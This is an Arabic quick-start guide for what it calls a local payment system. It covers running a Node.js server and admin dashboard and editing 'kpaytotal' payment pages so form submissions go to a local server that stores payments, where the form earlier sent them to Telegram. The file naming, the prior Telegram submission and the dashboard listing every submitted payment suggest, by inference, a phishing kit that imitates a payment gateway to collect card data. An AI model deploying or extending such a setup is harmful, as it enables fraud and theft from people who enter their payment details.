========================================
🎯 دليل البدء السريع - نظام الدفع المحلي
========================================

✅ تم إنشاء كل ما تحتاجه! اتبع الخطوات التالية:

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
الخطوة 1️⃣: تثبيت Node.js
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

1. قم بتحميل Node.js من: https://nodejs.org
2. اختر "LTS" (الإصدار الموصى به)
3. قم بتثبيته مع الإعدادات الافتراضية
4. أعد تشغيل جهازك

التحقق من التثبيت:
- افتح موجه الأوامر (Command Prompt)
- اكتب: node --version
- يجب أن ترى رقم الإصدار (مثل: v18.0.0)

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
الخطوة 2️⃣: تشغيل الخادم
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

الطريقة الأولى (الأسهل):
- اذهب إلى مجلد المشروع
- انقر مزدوجاً على: start-server.bat
- سيتم تشغيل الخادم تلقائياً

الطريقة الثانية (اليدوية):
1. افتح موجه الأوامر
2. اذهب إلى مجلد المشروع:
   cd c:\Users\user\Downloads\Wormhole\ Q55n9J
3. اكتب: npm start

ستظهر رسالة:
╔════════════════════════════════════════╗
║  🚀 خادم الدفع المحلي قيد التشغيل       ║
║  الموقع: http://localhost:3000         ║
║  لوحة التحكم: http://localhost:3000/admin  ║
╚════════════════════════════════════════╝

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
الخطوة 3️⃣: فتح لوحة التحكم
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

1. افتح متصفحك (Chrome, Firefox, Safari)
2. اذهب إلى: http://localhost:3000/admin
3. ستجد لوحة تحكم جميلة تعرض:
   - عدد الطلبات
   - عدد المدفوعات
   - الإحصائيات
   - جميع البيانات

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
الخطوة 4️⃣: استخدام نموذج الدفع
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

استخدم الملف الجديد: kpaytotal-new.html
أو عدّل ملفاتك الموجودة كما يلي:

1. في <head>: أضف هذا السطر
   <script src="payment-client.js"></script>

2. غيّر من:
   onsubmit="event.preventDefault(); sendToTelegram();"
   إلى:
   onsubmit="event.preventDefault(); sendToLocalServer();"

ذلك كل شيء! 🎉

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📁 الملفات المهمة
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

✅ server.js
   → الخادم الرئيسي (لا تعدله إلا إذا كنت متأكداً)

✅ payment-client.js
   → يحتوي على جميع الدوال المستخدمة في HTML
   → استيره في كل صفحة تحتاج دفع

✅ kpaytotal-new.html
   → نموذج دفع محدّث يستخدم الخادم المحلي

✅ package.json
   → قائمة المكتبات (لا تحذفه!)

✅ data/
   → مجلد حفظ البيانات (payments.json, orders.json)

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
❓ مشاكل شائعة وحلولها
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

❌ مشكلة: "Node.js غير معروف"
✅ الحل: أعد تثبيت Node.js واختر "Add to PATH" أثناء التثبيت

❌ مشكلة: "لا يمكن الاتصال بـ localhost:3000"
✅ الحل: 
   - تأكد من أن الخادم يعمل (ستظهر رسالة في الطرفية)
   - أعد فتح صفحة المتصفح

❌ مشكلة: "خطأ: الملف غير موجود"
✅ الحل: تأكد من أن جميع الملفات في نفس المجلد

❌ مشكلة: "Port 3000 مستخدم"
✅ الحل: غيّر Port في server.js (البحث عن `const PORT = 3000`)

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🎓 معلومات إضافية
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

📍 عنوان الخادم:
   - المحلي: http://localhost:3000
   - من جهاز آخر: http://YOUR_IP:3000
     (استبدل YOUR_IP بـ IP جهازك)

📊 API المتاحة:
   POST   /api/payment          → إرسال دفعة
   GET    /api/payments         → قائمة المدفوعات
   GET    /api/orders           → قائمة الطلبات
   POST   /api/orders           → إنشاء طلب
   GET    /api/dashboard/stats  → الإحصائيات

🔒 الأمان:
   - البيانات محفوظة محلياً فقط
   - لا توجد بيانات تُرسل للخارج
   - استخدم HTTPS عند النشر على الإنترنت

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
💬 هل تحتاج مساعدة؟
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

اقرأ الملف README_AR.md للمزيد من التفاصيل.

🎉 مبروك! الآن لديك نظام دفع محلي مستقل تماماً!
